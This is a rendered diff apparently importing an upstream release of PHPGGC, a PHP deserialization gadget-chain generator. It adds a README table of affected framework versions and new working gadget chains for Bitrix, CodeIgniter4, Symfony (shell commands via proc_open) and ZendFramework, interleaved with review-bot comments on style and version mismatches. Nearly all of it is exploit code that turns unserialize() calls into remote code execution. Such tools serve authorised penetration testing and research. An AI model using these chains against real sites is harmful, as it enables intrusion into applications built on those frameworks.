Import upstream version 0.20221103
Kali Janitor
1 year, 5 months ago
20 | 20 | ------------- |
21 | 21 | |
22 | 22 | NAME VERSION TYPE VECTOR I |
23 | Bitrix/RCE1 17.x.x <= 22.0.300 RCE (Function call) __destruct | |
23 | 24 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct |
24 | 25 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct |
25 | 26 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct |
84 | 85 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * |
85 | 86 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * |
86 | 87 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * |
87 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
88 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
89 | Symfony/RCE6 3.4 RCE (Command) __destruct * | |
88 | 90 | TCPDF/FD1 <= 6.3.5 File delete __destruct * |
89 | 91 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * |
90 | 92 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * |
113 | 115 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * |
114 | 116 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * |
115 | 117 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct |
116 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
118 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
119 | ZendFramework/RCE5 2.0.1 <= ? RCE (Function call) __destruct | |
117 | 120 | ``` |
118 | 121 | |
119 | 122 | Filter gadget chains: |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Bitrix; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '17.x.x <= 22.0.300'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'crlf'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Bitrix\Main\ORM\Data\Result( | |
16 | new \Bitrix\Main\Type\Dictionary( | |
17 | new \Bitrix\Main\Error( | |
18 | new \Bitrix\Main\UI\Viewer\ItemAttributes( | |
19 | new \Bitrix\Main\DB\ResultIterator( | |
20 | new \Bitrix\Main\DB\ArrayResult( | |
21 | $function, $parameter | |
22 | ) | |
23 | ) | |
24 | ) | |
25 | ) | |
26 | ) | |
27 | ); | |
28 | } | |
29 | } |
0 | <?php | |
1 | ||
2 | namespace Bitrix\Main { | |
3 | class Result | |
4 | { | |
5 | protected $errors; | |
6 | ||
7 | public function __construct(object $Dictionary) | |
8 | { | |
9 | $this->errors = $Dictionary; | |
10 | } | |
11 | } | |
12 | ||
13 | class Error { | |
14 | protected $message; | |
15 | ||
16 | public function __construct(object $ItemAttributes) | |
17 | { | |
18 | $this->message = $ItemAttributes; | |
19 | } | |
20 | } | |
21 | } | |
22 | ||
23 | namespace Bitrix\Main\ORM\Data { | |
24 | class Result extends \Bitrix\Main\Result | |
25 | { | |
26 | protected $isSuccess = false; | |
27 | protected $wereErrorsChecked = false; | |
28 | ||
29 | public function __construct(object $Dictionary) | |
30 | { | |
31 | parent::__construct($Dictionary); | |
32 | } | |
33 | } | |
34 | } | |
35 | ||
36 | namespace Bitrix\Main\Type { | |
37 | class Dictionary | |
38 | { | |
39 | protected $values; | |
40 | ||
41 | public function __construct(object $Error) | |
42 | { | |
43 | $this->values = [$Error]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Bitrix\Main\UI\Viewer { | |
49 | class ItemAttributes | |
50 | { | |
51 | protected $attributes; | |
52 | ||
53 | public function __construct(object $ResultIterator) | |
54 | { | |
55 | $this->attributes = $ResultIterator; | |
56 | } | |
57 | } | |
58 | } | |
59 | ||
60 | namespace Bitrix\Main\DB { | |
61 | class ResultIterator | |
62 | { | |
63 | private $counter = 0; | |
64 | private $currentData = 0; | |
65 | private $result; | |
66 | ||
67 | public function __construct(object $ArrayResult) | |
68 | { | |
69 | $this->result = $ArrayResult; | |
70 | } | |
71 | } | |
72 | ||
73 | class ArrayResult | |
74 | { | |
75 | protected $resource; | |
76 | protected $converters; | |
77 | ||
78 | public function __construct(string $function, string $parameter) | |
79 | { | |
80 | $this->converters = [$function, 'WriteFinalMessage']; | |
81 | $this->resource = [[$parameter], [['rce']]]; | |
82 | } | |
83 | } | |
84 | } |
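Review bot: The constructors in this stub file declare `object` and `string` parameter types and capitalised parameter names (`object $Dictionary`, `object $Error`), while every other gadget stub in this commit leaves constructor parameters untyped and lower-case. `object` as a parameter type needs PHP 7.2 or later, so this file sets a higher floor than its siblings. Either drop the hints, e.g. `public function __construct($dictionary)`, or state the minimum PHP version in a header comment. The constructor of `Bitrix\Main\ORM\Data\Result` only forwards to `parent::__construct($Dictionary)` and can be removed, because the inherited constructor has the same signature.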
3 | 3 | |
4 | 4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
6 | public static $version = '4.0.2 <= 4.0.3'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 |
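Review bot: The `$version` string of CodeIgniter4/RCE1 changes in this hunk, but the README table in the same commit still shows `CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4` as an unchanged context line. The rendering does not mark which of the two `$version` lines is the new one. If it is `'4.0.2 <= 4.0.3'`, the README row should read the same, since that table is what readers use to judge whether an installed release is affected. The range `4.0.0-beta.1 <= 4.0.0-rc.4` also appears on the new `RCE4` class, so the two chains' ranges should be checked against each other.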
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | }⏎ |
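Review bot: The file appears to end without a trailing newline (the `⏎` marker after the closing brace of class `RCE4`), and the Symfony RCE6 gadget stub added in this commit shows the same marker on its last line. Ending both files with a newline keeps later diffs from flagging the final line as changed.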
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers | |
3 | { | |
4 | class RedisHandler | |
5 | { | |
6 | protected $redis; | |
7 | ||
8 | public function __construct($func, $param) | |
9 | { | |
10 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
11 | new \CodeIgniter\Model( | |
12 | new \CodeIgniter\Database\BaseBuilder, | |
13 | new \CodeIgniter\Validation\Validation, | |
14 | $func | |
15 | ), | |
16 | $param | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers | |
23 | { | |
24 | class MemcachedHandler | |
25 | { | |
26 | protected $memcached; | |
27 | protected $lockKey; | |
28 | ||
29 | public function __construct($memcached, $param) | |
30 | { | |
31 | $this->lockKey = $param; | |
32 | $this->memcached = $memcached; | |
33 | } | |
34 | } | |
35 | } | |
36 | ||
37 | namespace CodeIgniter | |
38 | { | |
39 | class Model | |
40 | { | |
41 | protected $builder; | |
42 | protected $primaryKey; | |
43 | protected $beforeDelete; | |
44 | protected $validationRules; | |
45 | protected $validation; | |
46 | ||
47 | public function __construct($builder, $validation, $func) | |
48 | { | |
49 | $this->builder = $builder; | |
50 | $this->primaryKey = null; | |
51 | ||
52 | $this->beforeDelete = array(); | |
53 | $this->beforeDelete[] = "validate"; | |
54 | ||
55 | $this->validation = $validation; | |
56 | $this->validationRules = array( | |
57 | "id" => array($func) | |
58 | ); | |
59 | } | |
60 | } | |
61 | } | |
62 | ||
63 | namespace CodeIgniter\Validation | |
64 | { | |
65 | class Validation | |
66 | { | |
67 | protected $ruleSetFiles; | |
68 | ||
69 | public function __construct() | |
70 | { | |
71 | $this->ruleSetFiles = array("finfo"); | |
72 | } | |
73 | } | |
74 | } | |
75 | ||
76 | namespace CodeIgniter\Database | |
77 | { | |
78 | class BaseBuilder | |
79 | { | |
80 | } | |
81 | } |
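Review bot: This stub mixes styles that the other new stubs in the commit avoid. It uses long `array()` syntax where the Bitrix stub uses `[]`, writes `new \CodeIgniter\Database\BaseBuilder,` without parentheses, and sets `$this->primaryKey = null;`, which only repeats the default of an uninitialised untyped property. The literals `"validate"`, `"id"` and `"finfo"` carry no comment. A one-line comment per literal, in the manner of `//satisfying the class_exists` in the ZendFramework stub, would make the file reviewable without the framework source at hand.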
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Symfony; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = 'v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $command = $parameters['command']; | |
14 | ||
15 | return new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator( | |
16 | $command | |
17 | ); | |
18 | } | |
19 | } |
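Review bot: The range declared in `$version`, `'v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13'`, does not match the README row added in the same commit, which lists Symfony/RCE6 as `3.4` only. Anyone checking an installation against the table would miss the 4.0 to 4.1 range, so the row should repeat the class value. The `v` prefix and the `&` separator also differ from the neighbouring Symfony rows (`2.6 <= 2.8.32`, `3.4.0-34, 4.2.0-11, 4.3.0-7`); `'3.4.0-BETA4 <= 3.4.49, 4.0.0-BETA4 <= 4.1.13'` would follow the existing format.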
0 | <?php | |
1 | namespace Symfony\Component\Routing\Loader\Configurator | |
2 | { | |
3 | class ImportConfigurator | |
4 | { | |
5 | private $parent; | |
6 | ||
7 | function __construct($cmd) | |
8 | { | |
9 | $this->parent = new \Symfony\Component\Cache\Traits\RedisProxy($cmd); | |
10 | } | |
11 | } | |
12 | } | |
13 | ||
14 | namespace Symfony\Component\Cache\Traits | |
15 | { | |
16 | class RedisProxy | |
17 | { | |
18 | private $initializer; | |
19 | private $redis; | |
20 | ||
21 | function __construct($cmd) | |
22 | { | |
23 | $this->initializer = new \Symfony\Component\DependencyInjection\Loader\Configurator\InstanceofConfigurator($cmd); | |
24 | $this->redis = $cmd; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Symfony\Component\DependencyInjection\Loader\Configurator | |
30 | { | |
31 | class InstanceofConfigurator | |
32 | { | |
33 | protected $parent; | |
34 | ||
35 | function __construct($cmd) | |
36 | { | |
37 | $this->parent = new \Symfony\Component\Cache\Simple\Psr6Cache($cmd); | |
38 | } | |
39 | ||
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\Cache\Simple | |
44 | { | |
45 | class Psr6Cache | |
46 | { | |
47 | private $pool; | |
48 | ||
49 | function __construct($cmd) | |
50 | { | |
51 | $this->pool = new \Symfony\Component\Cache\Adapter\PhpArrayAdapter($cmd); | |
52 | } | |
53 | ||
54 | } | |
55 | } | |
56 | ||
57 | namespace Symfony\Component\Cache\Adapter | |
58 | { | |
59 | class PhpArrayAdapter | |
60 | { | |
61 | private $values; | |
62 | private $createCacheItem; | |
63 | ||
64 | function __construct($cmd) | |
65 | { | |
66 | $this->values = array($cmd=>[]); | |
67 | $this->createCacheItem = "proc_open"; | |
68 | } | |
69 | } | |
70 | }⏎ |
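Review bot: All five constructors in this file are declared as bare `function __construct($cmd)` with no visibility keyword, unlike the Bitrix and CodeIgniter stubs in this commit, which write `public function __construct(...)`. The ZendFramework RCE5 stub has the same omission. Writing `public function __construct($cmd)` in both files keeps the stubs uniform and matches PSR-12, which requires visibility on every method.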
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.0.0rc2 <= 2.5.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters["function"]; | |
13 | $parameter = $parameters["parameter"]; | |
14 | ||
15 | return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter); | |
16 | } | |
17 | } |
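Review bot: `$version` is `'2.0.0rc2 <= 2.5.3'` here, but the README row added for ZendFramework/RCE5 reads `2.0.1 <= ?`, which is the text of the RCE3 row in the same table. The row looks copied from RCE3 and should carry this class's range, because an open-ended `?` upper bound overstates which releases are affected. `generate()` also indexes `$parameters` with double-quoted keys (`$parameters["function"]`) where the other new chain classes use single quotes.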
0 | <?php | |
1 | namespace Zend\Cache\Storage\Adapter | |
2 | { | |
3 | class Memory | |
4 | { | |
5 | protected $eventHandles; | |
6 | protected $events; | |
7 | ||
8 | function __construct($function, $param) | |
9 | { | |
10 | $this->eventHandles = [1]; | |
11 | $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param); | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Zend\View\Renderer | |
17 | { | |
18 | class PhpRenderer | |
19 | { | |
20 | private $__helpers; | |
21 | ||
22 | function __construct($function, $param) | |
23 | { | |
24 | $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param); | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Zend\Tag\Cloud | |
30 | { | |
31 | class DecoratorPluginManager | |
32 | { | |
33 | protected $canonicalNames; | |
34 | protected $invokableClasses; | |
35 | protected $retrieveFromPeeringManagerFirst; | |
36 | protected $initializers; | |
37 | ||
38 | function __construct($function, $param) | |
39 | { | |
40 | $this->canonicalNames = array("detach"=>"cname","cname"=>"any"); | |
41 | $this->invokableClasses = array("cname"=>"Zend\Tag\Cloud\DecoratorPluginManager");//satisfying the class_exists | |
42 | $this->retrieveFromPeeringManagerFirst = false; | |
43 | $this->initializers = [new \Zend\Filter\FilterChain($function, $param)]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Zend\Filter | |
49 | { | |
50 | class FilterChain | |
51 | { | |
52 | protected $filters; | |
53 | ||
54 | function __construct($function, $param) | |
55 | { | |
56 | $this->filters = new \SplFixedArray(2); | |
57 | $this->filters[0] = array( | |
58 | new \Zend\Json\Expr($param), | |
59 | "__toString" | |
60 | ); | |
61 | $this->filters[1] = $function; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Zend\Json | |
67 | { | |
68 | class Expr | |
69 | { | |
70 | protected $expression; | |
71 | ||
72 | function __construct($param) | |
73 | { | |
74 | $this->expression = $param; | |
75 | } | |
76 | } | |
77 | } |
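Review bot: The class name stored in `$this->invokableClasses` is a double-quoted string containing backslashes, `"Zend\Tag\Cloud\DecoratorPluginManager"`. It holds the intended value only because `\T`, `\C` and `\D` are not escape sequences in PHP. A namespace segment starting with `t`, `n` or `v` would silently turn into a control character. `array("cname" => self::class)` or a single-quoted literal yields the same string without that risk. The trailing `//satisfying the class_exists` comment would read better as a full sentence on its own line above the assignment.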